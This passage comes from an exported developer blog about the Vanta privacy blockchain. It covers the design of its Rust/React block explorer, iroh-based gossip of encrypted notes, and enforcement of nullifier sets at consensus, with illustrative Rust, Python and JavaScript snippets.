I started [`vanta-explorer/`](https://github.com/Dax911/vanta/tree/main/vanta-explorer) on 2026-04-13 (`2db4e060 explorer: scaffold vanta-explorer (Rust backend + React web)`). The pitch was "an explorer that knows what a witness v2 commitment is, doesn't pretend transparent volume is the only volume, and gives me a tool I can extend without fighting a Node.js codebase that wasn't designed for it."
The shape: - **Backend** ([`vanta-explorer/backend`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend)) — Rust, Axum 0.7, SQLite via `sqlx`, polls `vantad` and `vanta-node` on intervals. Serves `/api/*`. - **Web** ([`vanta-explorer/web`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/web)) — React + Vite + Tailwind. Recharts for hashrate/throughput. SPA with React Router. Runs as static assets served by the Axum backend on the same port. - **Indexer modules**: `l1_poller`, `l2_poller`, `mempool_poller`, `pool_poller`. Each is a tokio task that pulls its source on a fixed interval and writes to SQLite. - **API modules**: `blocks`, `tx`, `address`, `mempool`, `network`, `pool`, `proofs`, `anon`, `l2`, `search`, `tip`, `sse`. Each is its own axum router section. The full backend `Cargo.toml`: ```toml [dependencies] axum = { version = "0.7", features = ["macros"] } tokio = { version = "1", features = ["full"] } tower-http = { version = "0.6", features = ["cors", "trace", "compression-br", "fs"] } sqlx = { version = "0.8", features = ["runtime-tokio", "sqlite", "macros", "migrate", "chrono"] } reqwest = { version = "0.12", features = ["json", "rustls-tls"], default-features = false } serde = { version = "1", features = ["derive"] } chrono = { version = "0.4", features = ["serde"] } async-stream = "0.3" ``` Reqwest with `rustls-tls` to skip the OpenSSL dependency. SQLite with chrono support so timestamps are `DateTime` end-to-end. `async-stream` for SSE — we ship server-sent events for live tip updates so the explorer's homepage updates within a second of a new block. The startup is the canonical four-task pattern: ```rust indexer::spawn_all(state.clone()); let app = api::router(state); let listener = TcpListener::bind(&bind_addr).await?; tokio::select! 
{ res = axum::serve(listener, app) => { res?; } _ = shutdown_signal() => { info!("shutdown requested, exiting"); std::process::exit(0); } } ``` The `std::process::exit(0)` on shutdown is a deliberate cheat. Background pollers and SSE streams are infinite loops; the tokio runtime drop blocks waiting for them to finish, which they never do. Calling exit explicitly when the user hits Ctrl-C makes the explorer shut down in milliseconds instead of however long the runtime decides to wait. Not pretty; it works. ## How shielded transfers are rendered Here's the part I want to be precise about. From the [executive-summary paper](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md): > Every non-coinbase witness v2 output carries `nValue = 0` on L1; the real amount lives inside the note commitment preimage and is never observable on the public ledger. The explorer can read every transaction in every block, but it cannot read amounts on shielded outputs. That's the whole point. So the question for a privacy-explorer designer is: *what does the user see?* Three options were on the table. **Option A: lie.** Pretend the output value is what `getrawtransaction` returns (zero) and label it "0 VANTA." Technically accurate, deeply misleading. **Option B: hide.** Don't show shielded transactions at all. Filter them out of the block view. Cowardly; users can read the raw RPC and see them. **Option C: render the commitment as the artefact.** Show the transaction. Show its inputs and outputs as opaque commitments — 32-byte hex strings that are *what the chain knows*. Show that the proof verified. Don't pretend to know more than that. We picked C. The 2026-04-16 commit `c912fc04 explorer: ZK transfers first-class + genesis scan + proof verification` is when this work landed. 
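Option C boils down to one branch in the output renderer. A toy Python model of that decision (field names are illustrative, not the real API shape):

```python
def render_output(out):
    """Decide what the explorer can honestly display for one output.
    A shielded output's only public artefact is its 32-byte commitment,
    so that's what gets rendered, never a misleading '0.0 VANTA'."""
    if out.get("type") == "witness_v2":
        return {"display": "commitment",
                "commitment": out["commitment"],
                "value": None}  # value is unknowable from chain data
    return {"display": "transparent", "value": out["value"]}

shielded = {"type": "witness_v2", "commitment": "ab" * 32}
row = render_output(shielded)
assert row["value"] is None and row["commitment"] == "ab" * 32
assert render_output({"type": "pubkeyhash", "value": 1.5})["value"] == 1.5
```

The point of the `value: None` is that the UI renders "shielded" rather than "0.0", which is exactly the misrepresentation Option A would commit.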
The `proofs` API endpoint pulls from `vanta-node`'s 500-slot proof event ring buffer (the one the [zkvm engineering paper](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) describes) and the explorer renders each verified proof with the public-input slots: SMT root, input commitments, nullifiers, output commitments, signed `value_balance`. A user looking at a shielded transaction sees: - the transaction's L1 outputs (mostly `nValue = 0` witness v2 commitments + maybe an OP_RETURN anchor) - a "ZK proof verified" badge - the public inputs from the proof, byte-accurately - the SMT root the proof was verified against - the nullifier (so they can confirm the spend isn't replayed) That's the whole story the chain has for that transaction. The explorer isn't hiding anything; it's rendering the right artefact. ## The L2 poller [`indexer/l2_poller.rs`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend/src/indexer) is the module that talks to `vanta-node` instead of `vantad`. It polls the L2 sidecar's REST API on a configurable interval and pulls: - `/status` for SMT root + commitment count + nullifier count - `/proofs/recent` for the proof event ring buffer - per-commitment lookup as the explorer's UI deep-links into specific notes The explorer never tries to *decrypt* notes. The encrypted-note inbox at `vanta-node` is for wallets, not for explorers — only the recipient's secret key can decrypt. The explorer's job is to render the public artefacts and link them. Pool stats come from the `pool_poller` against the public-pool's NestJS API (the 2026-04-13 commit `dbe62058 explorer: map real public-pool NestJS shape for /api/pool` is when that contract got nailed down). The explorer's pool page shows aggregate hashrate, recent shares, and recent block finds — it's a separate data source from L1 because the pool tracks shares and miners, not chain state. 
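The poller pattern itself (fetch a source on an interval, upsert the latest snapshot into SQLite) is small enough to model. A Python sketch; the real code is a tokio task using `sqlx`, and `fetch_status` here is a stand-in:

```python
import sqlite3

def fetch_status():
    # Stand-in for an HTTP GET against the L2 sidecar's /status endpoint.
    return {"smt_root": "00" * 32, "commitments": 42, "nullifiers": 7}

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE l2_status ("
           " id INTEGER PRIMARY KEY CHECK (id = 1),"
           " smt_root TEXT, commitments INT, nullifiers INT)")

def poll_once():
    """One tick of the poll loop: upsert the singleton status row."""
    s = fetch_status()
    db.execute(
        "INSERT INTO l2_status VALUES (1, ?, ?, ?)"
        " ON CONFLICT(id) DO UPDATE SET"
        "   smt_root = excluded.smt_root,"
        "   commitments = excluded.commitments,"
        "   nullifiers = excluded.nullifiers",
        (s["smt_root"], s["commitments"], s["nullifiers"]))
    db.commit()

poll_once()
poll_once()  # idempotent: still one row, holding the latest values
assert db.execute(
    "SELECT COUNT(*), MAX(commitments) FROM l2_status").fetchone() == (1, 42)
```

In the real indexer each module (`l1_poller`, `l2_poller`, `mempool_poller`, `pool_poller`) is this loop with its own fetcher, table, and interval.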
## The polish pass

A bunch of small commits in mid-April were polish:

- `6c374159 explorer: populate l1_txs + real TxDetail` — moved transaction-detail rendering from a placeholder to actual chain data
- `30fe0a04 explorer: persist pool metrics + historic hashrate chart` — historic hashrate via SQLite-backed time-series
- `600d2a03 explorer: code-split recharts via React.lazy` — Recharts is large; lazy-load it so the homepage stays fast
- `96333d42 explorer: client-side Merkle verify tool` — let users paste a transaction id and a Merkle root and verify inclusion locally, without the explorer
- `22698e6e explorer: phase 9 polish + fast backend shutdown` — the `std::process::exit` shutdown trick above

Each of these is a half-day of work. Explorer work is *eternal* polish — there's always one more chart, one more endpoint, one more responsive-layout tweak. I'm choosing to call it done at "users can navigate from a transaction to its proof to its L2 commitment to its receiving address."

## What I would do differently

1. **Don't start with the patched explorer at all.** It got us to "we have an explorer" in under a week, which mattered for the launch story. But the eventual full rewrite was inevitable. If I were doing this again I'd skip phase one and accept a one-week longer runway to launch.
2. **Push more shaping to the client.** The backend still shapes a lot of page-specific data server-side. A more aggressive split (the server is *only* a thin API, the client does *all* of the shaping) would simplify the backend further. The current setup is fine; it could be cleaner.
3. **Move the SQLite into a real time-series database.** SQLite is lovely for the indexed transactional data, but pool metrics + historic hashrate + mempool depth want a TSDB-shaped store (downsampling, retention policies, etc.). On the list, not urgent.
## What I changed my mind about I started building this thinking the privacy aspect would be the hardest part — that getting the UI to render commitments correctly without leaking would be a design conversation. It wasn't. The hardest part was the *boring stuff*: making the SQLite indexer fast enough to keep up with 1-minute blocks while also catching up from a cold start; making React Router not lose its mind when a deep-link lands on a page whose data isn't loaded yet; making the homepage's hashrate chart not janky. The privacy rendering, once we'd decided on Option C, was code. The rest of the explorer is the kind of work that explorers always are. ## Further reading - [`vanta-explorer/backend`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend) — the Rust + Axum + SQLite indexer - [`vanta-explorer/web`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/web) — the React + Vite SPA - [`explorer/`](https://github.com/Dax911/vanta/tree/main/explorer) — the original patched btc-rpc-explorer - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain - [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the L2 the explorer reads from - [`janoside/btc-rpc-explorer`](https://github.com/janoside/btc-rpc-explorer) — the upstream we forked for phase 1 --- # iroh in production: encrypted-note gossip on a 1-minute-block chain Canonical: https://blog.skill-issue.dev/blog/vanta_iroh_gossip_in_production/ Description: Why vanta-node uses iroh-gossip for L2 P2P instead of libp2p, what the topic + ALPN setup actually looks like, the GossipMessage shape, and the saturating-decrement bug that taught me an event ordering lesson. 
Published: 2026-04-13T17:46:02.000Z Tags: vanta, iroh, p2p, gossip, rust, quic, l2 import { Mermaid, Sandbox, TradeoffTable, Quote, Aside } from "@/components/mdx"; The L2 sidecar [I wrote about previously](/blog/vanta_sidecar_architecture/) has four jobs: watch L1, serve a REST API, snapshot state, and gossip with peers. The first three are well-trod tokio-task territory. The fourth is the one that actually matters for L2 decentralisation, because if every peer has to fetch encrypted notes from one REST server, that REST server is a centralisation point, and the privacy chain isn't really a privacy chain. This post is the deep dive on the gossip layer specifically. The transport is [iroh.computer](https://iroh.computer) — a pure-Rust QUIC stack with an opinionated NAT-traversal story and a built-in gossip protocol that does most of what we need. The integration code lives in [`vanta/vanta-node/src/gossip.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs), which is where I'd point you to read first if you want the unvarnished version. ## Why iroh The architecture doc puts the rationale tersely. From [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md): **P2P:** iroh.computer — pure Rust, QUIC-based, NAT traversal, gossip protocol, content-addressed blobs. Chosen over libp2p for simplicity, built-in QUIC + NAT hole-punching, and document sync (useful for offline branch-and-merge). That's the polite version. Let me unpack it with a tradeoff table that does *not* pull punches. The "configuration tax" point is the one I want to underline. libp2p is in principle the right answer; we used it on an earlier prototype. The problem was that *every* libp2p deployment is a snowflake — yamux vs mplex, noise vs tls, mdns vs static seeds, gossipsub v1.0 vs v1.1 — and getting two different libp2p deployments to talk *predictably* across a real residential-NAT network was a recurring time sink. 
iroh ships an opinionated default. There is one transport (QUIC), one ALPN per protocol, and one NAT-traversal story (n0-relay-assisted hole-punching). When it works it works the same way every time. When it fails, the failure modes are bounded and documented.

## Topology

The Vanta L2 gossip topology is one topic per chain, with content-addressed blob references for any payload that's too big for the gossip message-size limit (we cap at 64 KB per message, which is enough headroom for a single encrypted note plus headers).

<Mermaid chart={`graph LR
  subgraph topic["Topic: Vanta/L2/Gossip/v1"]
    P1[vanta-node #1<br/>Berkeley, CA]
    P2[vanta-node #2<br/>Berlin]
    P3[vanta-node #3<br/>Tokyo]
    P4[Wallet's embedded<br/>vanta-node]
  end
  P1 <-->|encrypted notes<br/>+ commitments<br/>+ nullifiers| P2
  P2 <-->|gossip| P3
  P3 <-->|gossip| P4
  P1 <-->|hole-punched| P4
  R[(N0 relay)]
  P1 -. relay if<br/>direct fails .-> R
  P4 -. relay if<br/>direct fails .-> R`}/>

Every node joins the same topic. Every message broadcast on that topic ends up at every other peer (eventually — this is gossip, not multicast, so it's `O(log N)` hops in expectation). The N0 relays are a fallback for peers behind symmetric NATs or other hole-punching-resistant boundaries; once a direct path is found, the relay drops out.

The topic is a SHA-256 of a fixed string in [`gossip.rs:42`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs):

```rust
fn vanta_topic() -> TopicId {
    use sha2::{Sha256, Digest};
    let mut hasher = Sha256::new();
    hasher.update(b"Vanta/L2/Gossip/v1");
    let hash = hasher.finalize();
    let mut bytes = [0u8; 32];
    bytes.copy_from_slice(&hash);
    TopicId::from_bytes(bytes)
}
```

`Vanta/L2/Gossip/v1`. The `v1` is intentional: when we ship a breaking change to the message format, we'll bump to `v2` and the two networks will simply not see each other. That's the cleanest cross-version migration story we have, and it's a single-line change.

## The message shape

Three message kinds, all bincode-serialised:

```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum GossipMessage {
    NewCommitment { commitment: Hash },
    NullifierRevealed { nullifier: Hash },
    EncryptedNote(EncryptedNote),
}
```

`Hash` is a 32-byte alias from `vanta_core`. `EncryptedNote` is an opaque ciphertext blob plus a recipient hint that wallets use to do trial-decryption. The ciphertext is encrypted-to-recipient-pubkey using the same envelope scheme [described in the nullifier-set post](/blog/vanta_l1_nullifier_set/) — `vanta-node` cannot decrypt a note even if it tries.

The relevant point is what's *not* here. There's no "request-response" message. There's no "inventory" or "bloom filter" or pull-based sync. iroh-gossip is broadcast-only; if a peer joins late, they catch up via the L1 watcher (which scans block history) and then receive new state via gossip going forward.
Decoupling history-sync from real-time-sync is a simplification: gossip is *always* real-time, history is *always* re-derived from L1. ## The send path Three small fan-out helpers, one private send method, in [`gossip.rs:53`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs): ```rust impl GossipHandle { pub async fn broadcast_commitment(&self, commitment: Hash) -> Result<()> { let msg = GossipMessage::NewCommitment { commitment }; self.broadcast(&msg).await } pub async fn broadcast_nullifier(&self, nullifier: Hash) -> Result<()> { let msg = GossipMessage::NullifierRevealed { nullifier }; self.broadcast(&msg).await } pub async fn broadcast_encrypted_note(&self, enc: EncryptedNote) -> Result<()> { let msg = GossipMessage::EncryptedNote(enc); self.broadcast(&msg).await } async fn broadcast(&self, msg: &GossipMessage) -> Result<()> { let bytes = bincode::serialize(msg)?; self.sender.broadcast(Bytes::from(bytes)).await?; Ok(()) } } ``` The `GossipHandle` is `Clone` and gets passed to the API server, the L1 watcher, and the swap module. Whoever has the handle can broadcast. The handle is a wrapper around `iroh_gossip::api::GossipSender`, which is a tokio-friendly mpsc-style channel into iroh's outbound queue. `bincode::serialize` is fine here because the message types are all simple plain-old-data with no `#[serde(skip)]` or recursion. The deserialization path (next section) is where the gotchas live. ## The receive path `start()` in [`gossip.rs:88`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs) is the function that brings up the whole gossip stack. It does five things: 1. Build an `Endpoint` with the `presets::N0` relay configuration. 2. Spawn a `Gossip` instance with a 64 KB max-message-size. 3. Wire a `Router` that accepts inbound gossip connections on the gossip ALPN. 4. Subscribe to the Vanta topic with the user's bootstrap peer list. 5. Spawn a tokio task to drain the inbound stream into `apply_gossip_message`. 
```rust
let endpoint = Endpoint::builder(presets::N0)
    .bind()
    .await?;

let gossip = Gossip::builder()
    .max_message_size(65536)
    .spawn(endpoint.clone());

let router = Router::builder(endpoint.clone())
    .accept(GOSSIP_ALPN, gossip.clone())
    .spawn();

let topic_id = vanta_topic();
let topic = gossip.subscribe(topic_id, peer_ids).await?;
let (sender, mut receiver) = topic.split();
```

The `accept(GOSSIP_ALPN, gossip.clone())` call is what tells the router "any inbound QUIC connection that negotiates the gossip ALPN gets handed to this Gossip instance." iroh multiplexes multiple protocols on one endpoint; today we only run gossip, but the same router could in principle accept blob-sync or document-sync ALPNs.

The receive loop calls `receiver.try_next()` in a tight loop and dispatches each event. There are three event types we care about:

```rust
async fn handle_gossip_event(
    state: &L2State,
    peer_counter: &std::sync::Arc<std::sync::atomic::AtomicUsize>,
    event: iroh_gossip::api::Event,
) {
    use std::sync::atomic::Ordering;
    match event {
        iroh_gossip::api::Event::Received(message) => {
            match bincode::deserialize::<GossipMessage>(&message.content) {
                Ok(msg) => apply_gossip_message(state, msg),
                Err(e) => {
                    tracing::debug!("Failed to deserialize gossip message: {e}");
                }
            }
        }
        iroh_gossip::api::Event::NeighborUp(peer_id) => {
            let n = peer_counter.fetch_add(1, Ordering::Relaxed) + 1;
            tracing::info!("Gossip peer joined: {} (now {n})", peer_id);
        }
        iroh_gossip::api::Event::NeighborDown(peer_id) => {
            peer_counter
                .fetch_update(Ordering::Relaxed, Ordering::Relaxed, |v| {
                    Some(v.saturating_sub(1))
                })
                .ok();
            let n = peer_counter.load(Ordering::Relaxed);
            tracing::info!("Gossip peer left: {} (now {n})", peer_id);
        }
        _ => {}
    }
}
```

The `_ => {}` is loud silence: iroh's Event enum has more variants than we care about (relay-state changes, lurker-mode signals) and we explicitly ignore them.

## The saturating-decrement gotcha

The first version of `NeighborDown` was `peer_counter.fetch_sub(1, Ordering::Relaxed)`.
In a happy path this was fine — every NeighborUp pairs with exactly one NeighborDown, the counter goes up and down, and `/status` shows the right number. In the actual iroh deployment, NeighborDown can fire without a corresponding NeighborUp ever having been observed. (Reasons: the event stream can drop messages under backpressure; a peer can be "down" from this node's perspective before this node has joined the topic enough to consider them "up.") The bug surfaced as `/status` returning `peer_count: 18446744073709551614`. I had wrapped from 0 → `usize::MAX - 1`. Counting backwards in unsigned arithmetic is a strict no. The fix is the `fetch_update` + `saturating_sub` pattern in the snippet above. It's slower than a single atomic op (it's a CAS loop) but it's load-bearingly correct: the counter never goes negative, and on the rare double-down-without-up the counter just stays at its current value. This is the kind of thing you don't notice until production. **TODO: Dax confirm we want to ship `peer_count` over `/status` as a `u32` and saturate there too** — even with the in-memory fix, a 64-bit counter shipped to a frontend could in principle overflow JavaScript's `Number.MAX_SAFE_INTEGER` if something ever went really wrong upstream. ## A toy iroh-shape demo We can't actually run iroh in a Sandbox — iroh isn't WASM-portable, and it wants real UDP sockets. But we *can* simulate the message-flow shape in plain Node, which is sometimes useful for understanding the topology when you read the Rust code. 
<Sandbox
  files={{
    "/index.js": `class Peer {
  constructor(name) {
    this.name = name;
    this.peers = [];
    this.seen = new Set();
  }
  connect(other) {
    this.peers.push(other);
    other.peers.push(this);
  }
  broadcast(msg) {
    this.seen.add(msg.id);
    for (const p of this.peers) {
      if (!p.seen.has(msg.id)) {
        p.seen.add(msg.id);
        console.log(\`  \${p.name}: \${msg.kind} \${msg.id}\`);
        p.broadcast(msg); // recursive flood — gossip is O(log N) in practice
      }
    }
  }
}

const a = new Peer("A");
const b = new Peer("B");
const c = new Peer("C");
a.connect(b);
b.connect(c); // A is not directly connected to C

console.log("A broadcasts NewCommitment(0xdeadbeef)");
a.broadcast({ id: "0xdeadbeef", kind: "NewCommitment" });

console.log("\\nC broadcasts EncryptedNote(0xcafebabe)");
c.broadcast({ id: "0xcafebabe", kind: "EncryptedNote" });

console.log("\\nFinal seen sets:");
for (const p of [a, b, c]) {
  console.log(\`  \${p.name}: [\${[...p.seen].join(", ")}]\`);
}
`,
    "/package.json": `{
  "name": "iroh-shape-demo",
  "version": "1.0.0",
  "main": "index.js"
}
`,
  }}
/>

This is the *shape* of gossip flooding. iroh's actual implementation uses HyParView + Plumtree — more sophisticated, with eager-push trees and lazy-pull repair — but the user-facing semantic is the same: broadcast on a topic, every peer eventually sees the message, exactly once.

## Encrypted notes specifically

The largest message type, `EncryptedNote`, is what wallets actually consume. The flow is:

1. Sender's wallet generates a shielded transaction. Part of the witness is an encrypted ciphertext addressed to the recipient's pubkey.
2. Sender's `vanta-node` (via the desktop app) calls `broadcast_encrypted_note(ciphertext)`.
3. iroh-gossip floods every peer in the topic. Every L2 node — including the recipient's — has the ciphertext in memory.
4. The recipient's wallet calls `/notes/scan` against its local `vanta-node`, which trial-decrypts every recently-seen ciphertext against the wallet's secret key.
5. If a trial decryption succeeds, the wallet has detected a payment.

There is no "addressing." There is no "the recipient asks for their notes." Every peer has every note. Each peer's wallet decides which notes are theirs by trying to decrypt.
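Trial decryption is easy to model because authenticated encryption fails loudly under the wrong key: "is this note mine" is exactly "does decryption succeed". A Python sketch with a toy authenticated scheme (illustrative only, not Vanta's real envelope):

```python
import hashlib
import hmac
import os

# Toy authenticated encryption: a SHA-256-derived XOR stream plus an
# HMAC tag. Stands in for the real encrypt-to-recipient-pubkey envelope.
def seal(key, plaintext):
    nonce = os.urandom(16)
    stream = hashlib.sha256(key + nonce).digest()
    ct = bytes(p ^ s for p, s in zip(plaintext, stream))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def open_note(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # wrong key: MAC check fails, note is not ours
    stream = hashlib.sha256(key + nonce).digest()
    return bytes(c ^ s for c, s in zip(ct, stream))

alice, bob = b"alice-secret", b"bob-secret"
notes = [seal(alice, b"5 VANTA"), seal(bob, b"3 VANTA")]
# Bob scans every gossiped ciphertext; only his own decrypts.
mine = [pt for pt in (open_note(bob, n) for n in notes) if pt is not None]
assert mine == [b"3 VANTA"]
```

The gossip layer never needs to know who a note is for; the "address" is the ability to produce a valid decryption.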
This is the same architectural pattern Zcash sapling uses — a public ciphertext stream with private addressability — and it's why the gossip layer can be totally untrusted: peers see ciphertexts, recipients see plaintext. ## What's not in this implementation A few things to flag, both for honesty and for the next person to read this. **No gossip-layer backpressure.** If a peer publishes 10,000 encrypted notes in a second, every other peer's tokio task for the receive loop has to deserialize all of them. There's no rate limit, no back-off, no "too many pending events" exception. This is fine on a 1-minute-block chain where the pool's submission rate is bounded, but it would be a real problem on a 250 ms-block chain. **No peer reputation.** Every peer is equal. A misbehaving peer (sending malformed messages, spamming) is just ignored on a per-message basis. We don't disconnect them, ban them, or de-prefer them in routing. iroh has the primitives (`endpoint.close_peer`) but we don't use them. **No persistence across restarts.** When `vanta-node` restarts, it forgets every peer it had ever seen and re-bootstraps from the static seed list. This costs ~2 seconds on warm starts. The L1 watcher catches state up from chain history regardless, so this isn't a correctness concern, but a peer cache would shave the startup window. **No multi-topic.** All Vanta nodes are on one topic. We'll need at least mainnet/testnet split when there's a testnet to speak of; right now the topic is `Vanta/L2/Gossip/v1` and that's literally the only topic that exists. **TODO: Dax confirm we add `Vanta/L2/Gossip/regtest` when the regtest deploy lands.** ## What I changed my mind about I'd been libp2p-curious for a long time. The crate is mature, it's used by IPFS and Polkadot, the docs are pretty good. I started the Vanta L2 with a libp2p prototype and it worked. Two things made me switch. 
**The configuration burden is per-developer.** Every new contributor who touches `vanta-node` would need to internalise the libp2p configuration matrix (or worse: would copy-paste it from somewhere and not understand what they were copying). iroh's `presets::N0` is a single import. The cognitive load is bounded. **NAT traversal is solved-default.** libp2p's NAT traversal is a la carte: configure DCUtR, configure STUN, configure relays. iroh's is built in. On a privacy chain whose users include anyone with a residential ISP, NAT traversal is not optional and the failure mode (peer can't be reached) cascades into "wallet stuck waiting for sync." Defaulting it on saved a class of bug I was tired of debugging. The cost of the switch was about a week of integration work. I'd take that trade every time. iroh has bugs (the saturating-decrement story above is one of mine), but they're bugs at a scope I can hold in my head. ## Further reading - [`vanta/vanta-node/src/gossip.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs) — the file this post walks - [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) — the rationale for picking iroh - [iroh.computer](https://iroh.computer) — the upstream project - [iroh-gossip on docs.rs](https://docs.rs/iroh-gossip) — the crate API - [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the daemon this gossip layer lives inside - [Cruiser: A Tauri Hookup App on iroh](/blog/cruiser_iroh_gossip_p2p/) — how the same primitives ship in a different product --- # L1 nullifier sets: enforcing no-double-spend at consensus Canonical: https://blog.skill-issue.dev/blog/vanta_l1_nullifier_set/ Description: Most privacy chains track spent notes in a wallet-side index and pray. Vanta puts the nullifier set in chainstate and lets the consensus rules do the praying. Here's why that line moved, and what it costs. 
Published: 2026-04-17T05:52:57.000Z Tags: vanta, zk, nullifier, consensus, bitcoin, utxo This is a follow-up to [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) and a sibling to [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/). The first post explains the chain. The second explains what nullifiers *are*. This one is about a deliberate, opinionated design decision: **nullifiers in Vanta live at consensus, not at the wallet.** I want to walk through what that means, what alternatives we considered, what it costs, and why the cost is worth paying. ## The problem statement In a shielded UTXO model, every spent note has a deterministic, single-use **nullifier** — a hash that proves to a verifier *"some unspent note has been consumed"* without revealing *which* one. The classic Zcash construction is roughly `Poseidon(note_secret_key, commitment)`. The same secret + the same commitment always produces the same nullifier; revealing it twice means two spends of the same note. The verifier needs to know the global set of nullifiers ever revealed. If the same nullifier appears twice, one of the two spends is invalid. That's how double-spend is detected. The question every chain has to answer: *where does that nullifier set live?* ## Three answers ### Answer 1 — wallet-side index The [original Zcash sapling protocol](https://zips.z.cash/protocol/protocol.pdf) materialises the nullifier set client-side. Every wallet trying to spend reads the chain, builds a local nullifier set, and refuses to construct a transaction whose nullifier already appears. This works. It's also fragile in a way that always made me uncomfortable. A wallet bug — or a malicious wallet — can construct a transaction whose nullifier matches a previous one. The transaction is *valid by chain rules* until the second spend is mined; only then do nodes notice. In practice this means a brief reorg window where a double-spend is technically possible. 
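Concretely, the wallet-side index is just set membership. A minimal sketch, with `DefaultHasher` standing in for Poseidon and every name (`WalletIndex`, `try_spend`) hypothetical:

```rust
use std::collections::hash_map::DefaultHasher;
use std::collections::HashSet;
use std::hash::{Hash, Hasher};

// Sketch of the Answer-1 (wallet-side) double-spend guard. The real
// construction hashes with Poseidon over a prime field; DefaultHasher
// here is a stand-in purely for shape.
fn nullifier(note_secret_key: u64, commitment: u64) -> u64 {
    let mut h = DefaultHasher::new();
    (note_secret_key, commitment).hash(&mut h);
    h.finish() // same (key, commitment) -> same nullifier, always
}

/// A wallet refuses to build a spend whose nullifier it has already
/// seen. The whole Answer-1 security story lives in this one `insert`.
struct WalletIndex {
    seen: HashSet<u64>,
}

impl WalletIndex {
    fn new() -> Self {
        WalletIndex { seen: HashSet::new() }
    }
    /// Returns false if this spend would be a double-spend.
    fn try_spend(&mut self, sk: u64, commitment: u64) -> bool {
        self.seen.insert(nullifier(sk, commitment))
    }
}

fn main() {
    let mut wallet = WalletIndex::new();
    assert!(wallet.try_spend(42, 7)); // first spend of the note: ok
    assert!(!wallet.try_spend(42, 7)); // same note again: refused
    assert!(wallet.try_spend(42, 8)); // different commitment: ok
    println!("double-spend refused locally");
}
```

The fragility is visible in the sketch: nothing in the chain's rules forces a wallet to call `try_spend` before broadcasting.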
It also means **node operators can't run a privacy chain without the wallet code.** That's a sociological problem more than a technical one, but it's real. ### Answer 2 — separate nullifier-tracking smart contract / sidechain The Tornado-Cash-on-Ethereum approach. The nullifier set lives in a smart contract. The contract enforces uniqueness as a side effect of every withdraw. The chain itself doesn't know what nullifiers are — it just runs the contract. This works on Ethereum because Ethereum has expressive smart contracts that can hold and mutate large state cheaply (relative to L1 gas). It's a non-starter on a Bitcoin-fork chain because Bitcoin Script doesn't have arbitrary stateful contracts. You could put a precompile in. We didn't want to. ### Answer 3 — chainstate The nullifier set lives in the same database the UTXO set lives in. Validating a block means *(a)* checking script signatures, *(b)* checking the witness ZK proofs, *(c)* checking that no two spent nullifiers in this block (or this block + history) collide. Nodes that don't enforce nullifier-uniqueness accept blocks the rest of the network rejects, and fork off onto an invalid chain. They literally cannot stay in sync. This is what Vanta does. ## Why we picked answer 3 Three reasons. ### Soundness A nullifier collision in chainstate is a *consensus violation,* not a wallet bug. There is no version of the network where the double-spend is "valid for a few blocks until someone notices." Either the block is valid or it's not. The confidence story is the same as Bitcoin's UTXO model: a confirmed transaction is final under the same assumptions every other Bitcoin transaction is final under. This matters for an audience that already understands Bitcoin's finality assumptions. We did not want to introduce a *new* set of finality caveats for the privacy layer.
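Check *(c)* is mechanical. A minimal sketch of the consensus-side rule, with hypothetical names — the real check runs in the C++ validator against the chainstate DB:

```rust
use std::collections::HashSet;

// Sketch of check (c): no nullifier in a block may collide with another
// in the same block or with chain history. Names are hypothetical.
struct Chainstate {
    nullifiers: HashSet<[u8; 32]>,
}

/// Returns Err on the first colliding nullifier; on Ok, the block's
/// nullifiers have been committed to chainstate.
fn connect_block(
    state: &mut Chainstate,
    block_nullifiers: &[[u8; 32]],
) -> Result<(), [u8; 32]> {
    let mut in_block: HashSet<[u8; 32]> = HashSet::new();
    for nf in block_nullifiers {
        // Intra-block collision or historical collision: consensus-invalid.
        if !in_block.insert(*nf) || state.nullifiers.contains(nf) {
            return Err(*nf);
        }
    }
    // Only mutate chainstate once the whole block has passed.
    state.nullifiers.extend(block_nullifiers.iter().copied());
    Ok(())
}

fn main() {
    let mut state = Chainstate { nullifiers: HashSet::new() };
    let a = [1u8; 32];
    let b = [2u8; 32];
    assert!(connect_block(&mut state, &[a, b]).is_ok());
    // Re-revealing `a` in a later block is a consensus violation, not a
    // wallet bug — the block is simply invalid.
    assert_eq!(connect_block(&mut state, &[a]), Err(a));
    println!("duplicate nullifier rejected at consensus");
}
```

Note the ordering: chainstate is only mutated after the whole block validates, so a rejected block leaves the nullifier set untouched.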
